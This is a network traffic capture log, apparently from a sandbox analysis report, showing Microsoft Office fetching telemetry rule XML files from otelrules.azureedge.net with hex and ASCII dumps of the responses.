                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:05 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:05 GMT
                            Content-Type: text/xml
                            Content-Length: 958
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                            ETag: "0x8DC582BA0A31B3B"
                            x-ms-request-id: 11343522-e01e-0085-0240-36c311000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223905Z-1749fc9bdbddsfp5hC1DFWz2ng00000000y000000000tpmu
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:05 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                            Session IDSource IPSource PortDestination IPDestination Port
                            90192.168.2.45521813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:06 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:06 UTC517INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:06 GMT
                            Content-Type: text/xml
                            Content-Length: 2592
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                            ETag: "0x8DC582BB5B890DB"
                            x-ms-request-id: 682504c0-001e-005a-75d2-2cc3d0000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223906Z-16547b76f7f76p6chC1DFWctqw0000000meg0000000043fy
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:06 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                            Session IDSource IPSource PortDestination IPDestination Port
                            91192.168.2.45521913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:06 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:06 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:06 GMT
                            Content-Type: text/xml
                            Content-Length: 501
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                            ETag: "0x8DC582BACFDAACD"
                            x-ms-request-id: 0f1e6d84-801e-007b-5baf-36e7ab000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223906Z-16547b76f7fwvr5dhC1DFW2c940000000m2000000000yx80
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:06 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                            Session IDSource IPSource PortDestination IPDestination Port
                            92192.168.2.45522013.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:06 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:06 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:06 GMT
                            Content-Type: text/xml
                            Content-Length: 3342
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                            ETag: "0x8DC582B927E47E9"
                            x-ms-request-id: 659aa3e6-801e-008f-64d2-2c2c5d000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223906Z-16547b76f7fj897nhC1DFWdwq40000000m4000000000eyra
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:06 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                            Session IDSource IPSource PortDestination IPDestination Port
                            93192.168.2.45522113.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:06 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:06 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:06 GMT
                            Content-Type: text/xml
                            Content-Length: 2284
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                            ETag: "0x8DC582BCD58BEEE"
                            x-ms-request-id: 7f14e84b-501e-00a3-1aaf-36c0f2000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223906Z-1866b5c5fbbqjkpbhC1DFWt4h400000000m000000000m88d
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:06 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                            Session IDSource IPSource PortDestination IPDestination Port
                            94192.168.2.45522213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:06 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:06 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:06 GMT
                            Content-Type: text/xml
                            Content-Length: 1393
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                            ETag: "0x8DC582BE3E55B6E"
                            x-ms-request-id: 0d0c2c5f-f01e-0020-0d06-36956b000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223906Z-1749fc9bdbdgs9sshC1DFWt6ws000000036000000000vu18
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:06 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                            Session IDSource IPSource PortDestination IPDestination Port
                            95192.168.2.45522313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:06 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:07 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:06 GMT
                            Content-Type: text/xml
                            Content-Length: 1356
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                            ETag: "0x8DC582BDC681E17"
                            x-ms-request-id: bf771d7d-301e-001f-16a1-34aa3a000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223906Z-r178fb8d765z9wvrhC1DFW1a0s000000018g00000000n5zq
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:07 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                            Session IDSource IPSource PortDestination IPDestination Port
                            96192.168.2.45522413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:06 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:07 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:07 GMT
                            Content-Type: text/xml
                            Content-Length: 1393
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                            ETag: "0x8DC582BE39DFC9B"
                            x-ms-request-id: 8891ec8a-001e-008d-7f7a-35d91e000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223907Z-r178fb8d765zlhnthC1DFWvdu000000001rg00000000e6ca
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:07 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                            Session IDSource IPSource PortDestination IPDestination Port
                            97192.168.2.45522513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:07 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:07 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:07 GMT
                            Content-Type: text/xml
                            Content-Length: 1356
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                            ETag: "0x8DC582BDF66E42D"
                            x-ms-request-id: f8aeeb5f-a01e-0032-4aa0-341949000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223907Z-1749fc9bdbdhnf7rhC1DFWgd0n000000032g00000000ybva
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:07 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                            Session IDSource IPSource PortDestination IPDestination Port
                            98192.168.2.45522613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:07 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:07 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:07 GMT
                            Content-Type: text/xml
                            Content-Length: 1395
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                            ETag: "0x8DC582BE017CAD3"
                            x-ms-request-id: 0f1e6da1-801e-007b-6baf-36e7ab000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223907Z-16547b76f7fnlcwwhC1DFWz6gw0000000me0000000006ubr
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:07 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                            Session IDSource IPSource PortDestination IPDestination Port
                            99192.168.2.45522713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:07 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:07 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:07 GMT
                            Content-Type: text/xml
                            Content-Length: 1358
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                            ETag: "0x8DC582BE6431446"
                            x-ms-request-id: 970a151a-f01e-003f-26c9-36d19d000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223907Z-r178fb8d765dbpv9hC1DFWma7000000001f000000000nd78
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:07 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                            Session IDSource IPSource PortDestination IPDestination Port
                            100192.168.2.45522813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:07 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:07 UTC517INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:07 GMT
                            Content-Type: text/xml
                            Content-Length: 1395
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                            ETag: "0x8DC582BDE12A98D"
                            x-ms-request-id: 43524f19-601e-003e-07d2-2c3248000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223907Z-16547b76f7fvllnfhC1DFWxkg80000000mb000000000b1f2
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
